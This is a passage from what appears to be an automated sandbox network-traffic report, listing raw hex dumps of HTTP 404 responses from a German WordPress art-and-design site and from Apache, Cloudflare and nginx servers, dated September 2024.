6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:26 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:32 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QrZZmLd3CxMzuhOdmEFVo%2F124P9tHUZ80XAD6guzufB%2BONFGryXrEFtlSU9H0wEOj68pt4VuwrXS2AwU89AGSBWjYM2O7blQDbooMnwCBmO8NPetPQI%2FyUHQM3mMI6Kvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5246ffbd7cb1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXOkGO188K0%2FdGhR72%2BE06zm0h4ugb%2FDxeDDFKOcLIQmJXLUPxjwAbNl%2FOZQV5q6paIr9ELY8Y5fIWDKrVq6%2BXXLwUESNUBbNpTqs2h8YQajLj8qG7TvPsBoY6nq3OcUZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc525708be424c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jkYK070JsTo1ofk9%2BPbAilfG%2F4MbAiGjpG%2B0uCu7IfHNv2mwyh4NSEHAYN%2Bj%2FoItBtq801TM%2B0OaQDgzRpcOt%2BYzhBkI4anoH%2BjbMDLN3NDqIP1A62Ddxh5SNkKnK%2F30Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5266f8027cf3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Frgizj9WQtT5Pc2HYVb5PiOilrxpS5VhIzAndHwBKA7mMQLMcC%2B%2BKU%2BgxNHgaWwFbHSqiVPJiAq3WGhwXn1BPBEwVRXSLs1O3ywRAx%2FeVhZEP45pi2DFpFWiHXV5DNCPnw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bdc5276fa564246-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:55 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 